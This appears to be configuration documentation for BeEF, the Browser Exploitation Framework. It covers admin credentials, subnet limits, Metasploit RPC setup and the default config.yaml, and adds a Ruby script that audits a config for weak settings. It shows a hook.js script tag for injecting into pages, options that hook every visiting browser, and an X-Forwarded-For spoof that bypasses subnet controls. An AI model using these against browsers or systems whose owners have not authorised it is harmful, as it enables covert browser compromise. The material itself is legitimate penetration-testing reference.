BeEF Configuration
Introduction
BeEF uses YAML files to configure its core functionality and its extensions. Most of the core BeEF configuration lives in the main configuration file, config.yaml, located in the BeEF directory.
To configure an extension, modify the config.yaml file in the folder of the extension you want to change. For more information on command module configuration files, see: Command Module Configuration.
Authentication
Credentials
To use BeEF you must change the username and password.
Navigate to the BeEF directory and edit config.yaml with your preferred text editor (Vim, Nano, etc.).
Update the section shown in the following example:
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
    user: "beef"
    passwd: "something unique and complex"
Access Control
Network Restrictions
The web interface used for hooking or managing BeEF can be restricted by subnet. This is done in the beef/config.yaml file under Interface / IP restrictions (beef/config.yaml.beef.restrictions.https).
The permitted_ui_subnet access control should be used to restrict access to the admin interface.
For example:
restrictions:
    permitted_hooking_subnet: ["10.1.0.0/16"]
    permitted_ui_subnet: ["127.0.0.1/32"]
These access restrictions can be bypassed and should not be relied upon on their own.
Ideally, BeEF should run behind a reverse proxy that strips user-supplied proxy headers such as X-Forwarded-For. The permitted_ui_subnet should be restricted to 127.0.0.1/32 and accessed through an SSH tunnel. If a reverse proxy is used, the allow_reverse_proxy configuration setting needs to be changed from its default of false to true. BeEF will then use the IP address in the X-Forwarded-For proxy header to decide whether a request is allowed to access the Admin UI. Note: if this setting is true and the user interface is accessed directly, or the reverse proxy does not strip user-supplied routing-related HTTP headers (such as X-Forwarded-For), the IP address presented to the admin UI can be spoofed.
While it is not possible to bypass a /32 access control, more permissive access controls such as /24 or /16 can be bypassed. In those cases the IP address access control can be bypassed by supplying a valid IP address within the permitted range in the X-Forwarded-For header.
For example, permitted_ui_subnet: ["10.1.1.1/24"] can be bypassed by supplying X-Forwarded-For: 10.1.1.123.
By guessing a valid IP address in the correct subnet, an unauthorized user could infer a target's IP address by trying to identify valid IP addresses within the permitted_hooking_subnet of an active campaign, or access the admin interface wherever permitted_ui_subnet does not use a /32 IP range.
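As an added example (not BeEF's own code), the following Ruby script audits a config.yaml for the settings discussed under Credentials and Network Restrictions: default beef/beef credentials, a permitted_ui_subnet wider than a single host, and allow_reverse_proxy enabled alongside such a subnet. The embedded config fragment is constructed for the example and the function names are my own.

```ruby
# Added example, not part of BeEF: audit a BeEF config.yaml for the weak
# settings discussed above (default credentials, permissive permitted_ui_subnet,
# allow_reverse_proxy combined with a non-/32 UI subnet). Ruby stdlib only.
require 'yaml'
require 'ipaddr'

# Constructed sample config.yaml fragment left mostly at the shipped defaults.
SAMPLE_CONFIG = <<~YAML
  beef:
    credentials:
      user: "beef"
      passwd: "beef"
    restrictions:
      permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
      permitted_ui_subnet: ["10.1.1.1/24"]
    http:
      allow_reverse_proxy: true
YAML

# True only when every entry is a single host (/32 for IPv4, /128 for IPv6).
def single_host_only?(subnets)
  list = Array(subnets)
  return false if list.empty?
  list.all? do |cidr|
    net = IPAddr.new(cidr)
    net.prefix == (net.ipv4? ? 32 : 128)
  end
end

# Returns an array of finding strings; an empty array means nothing to flag.
def audit_beef_config(yaml_text)
  beef = YAML.safe_load(yaml_text).fetch('beef')
  findings = []
  creds = beef.fetch('credentials', {})
  if creds['user'] == 'beef' && creds['passwd'] == 'beef'
    findings << 'credentials: default beef/beef still in use'
  end
  ui_subnet = beef.dig('restrictions', 'permitted_ui_subnet')
  unless single_host_only?(ui_subnet)
    findings << 'permitted_ui_subnet: not limited to a single host such as 127.0.0.1/32'
    if beef.dig('http', 'allow_reverse_proxy')
      findings << 'allow_reverse_proxy: true with a non-/32 UI subnet, so a forged X-Forwarded-For can satisfy the check'
    end
  end
  findings
end

puts audit_beef_config(SAMPLE_CONFIG) # print the findings for the constructed sample
```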
Admin Interface
The panel path should also be changed using the beef.extension.admin_ui.base_path configuration option (i.e. the "extension" > "admin_ui" subsection of the beef/config.yaml file).
Note that this does not prevent attacks against the /api/ REST interface.
Login Restrictions
By default the Admin UI limits login attempts to 1 attempt per second. This can be changed via the beef.extensions.admin_ui.login_fail_delay value in extensions/admin_ui/config.yaml.
By default the REST API interface limits login attempts to 1 attempt every 0.05 seconds. This can be changed via the beef.restrictions.api_attempt_delay value in config.yaml.
hook.js
The dynamically generated JavaScript hook file, hook.js, is automatically mounted at /hook.js.
If your BeEF server is 123.123.123.123:3000, the script can be included with an HTML script tag as follows:
<script src="http://123.123.123.123:3000/hook.js"></script>
Web Server Configuration
The web server is fully configurable; this is done in the http subsection of the config.yaml file:
http:
    debug: false # Will print verbose message in BeEF console
    host: "0.0.0.0" # IP address of the web server
    port: "3000" # Port of the web server
    # If BeEF is running behind a reverse proxy or NAT
    # set the public hostname and port here
    public: "8.7.6.5"
    public_port: "3000"
    dns: "localhost" # Address of DNS server
    hook_file: "/hook.js" # Path for hooking script
    hook_session_name: "BEEFHOOK" # Name of session
    session_cookie_name: "BEEFSESSION" # Name of BeEF cookie
Web Server Imitation
BeEF also has basic web server imitation capability. The root page and the HTTP 404 error page can be changed to reflect several popular web servers (Apache, IIS, NGINX) using the beef.http.web_server_imitation directive.
For example:
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
    enable: true
    type: "apache" # Supported: apache, iis, nginx
    hook_404: false # inject BeEF hook in HTTP 404 responses
    hook_root: false # inject BeEF hook in the server home page
When enabled, the hook_404 and hook_root directives inject the BeEF hook into the HTTP 404 error page and the web root page respectively. This hooks any browser that inspects the web server.
Configuring Extensions
Enabling Extensions
Extensions should be enabled in the main config.yaml:
extension:
    requester:
        enable: true
    proxy:
        enable: true
    metasploit:
        enable: false
    social_engineering:
        enable: true
    evasion:
        enable: false
    console:
        shell:
            enable: false
When using BeEF, the demos extension should be disabled by setting enable: false in config.yaml.
Metasploit
To enable Metasploit, you need to enable it in beef/config.yaml (beef.extensions.metasploit) by changing the value to true.
extension:
    admin_ui:
    metasploit:
        enable: true
The Metasploit extension should be configured by modifying its configuration file, extensions/metasploit/config.yml (see below; beef/extensions/metasploit/config.yaml.beef.extensions.metasploit):
name: 'Metasploit'
enable: true
host: "127.0.0.1"
port: 55552
user: "msf"
pass: "<password>"
uri: '/api'
ssl: true
ssl_version: 'TLS1'
ssl_verify: true
callback_host: "127.0.0.1"
autopwn_url: "autopwn"
Be sure to change the pass field.
Authenticated access to the Metasploit RPC service can be used to execute arbitrary commands on the underlying operating system.
Apart from the host and callback_host parameters, most of the configuration can be left at its defaults; those two should hold the IP address of the host on which Metasploit is reachable.
Use the same host in the next step (before the user and password information).
To enable RPC communication, the following command needs to be run in Metasploit:
load msgrpc ServerHost=127.0.0.1 User=msf Pass=<password> SSL=y
This command can be written to a file and passed to msfconsole with the -r option.
It is usually easier to run it in the Metasploit console. Keep the settings (host, user, pass and ssl) the same as in the configuration file.
Of course, the IP address and password should match the earlier YAML configuration file.
Starting BeEF
You can now start BeEF by running the beef script in the root directory.
You can also use the following options:
Usage: beef [options]
    -x, --reset              Reset the database
    -v, --verbose            Display debug information
    -a, --ascii_art          Prints BeEF ascii art
    -c, --config FILE        Load a different configuration file: if it's called custom-config.yaml, git automatically ignores it.
    -p, --port PORT          Change the default BeEF listening port
    -w, --wsport WS_PORT     Change the default BeEF WebSocket listening port
Appendix: contents of config.yaml:
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.5.0.0-alpha-pre'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80
    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user: "beef"
        passwd: "beef"
    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
        # slow API calls to 1 every api_attempt_delay seconds
        api_attempt_delay: "0.05"
    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        # when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        # when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000
        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        # set the public hostname below:
        #public: "" # public hostname/IP address
        # Reverse Proxy / NAT
        # If you want BeEF to be accessible behind a reverse proxy or NAT,
        # set both the publicly accessible hostname/IP address and port below:
        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
        # by altering the X-FORWARDED-FOR ip address in the request header.
        allow_reverse_proxy: false
        #public: "" # public hostname/IP address
        #public_port: "" # public port (experimental)
        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        file: "beef.db"
    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000
        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true
    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false
    # IP Geolocation
    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
    geoip:
        enable: true
        database: '/opt/GeoIP/GeoLite2-City.mmdb'
    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false
    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    # and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: true
        events:
            enable: true
        evasion:
            enable: false
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        xssrays:
            enable: true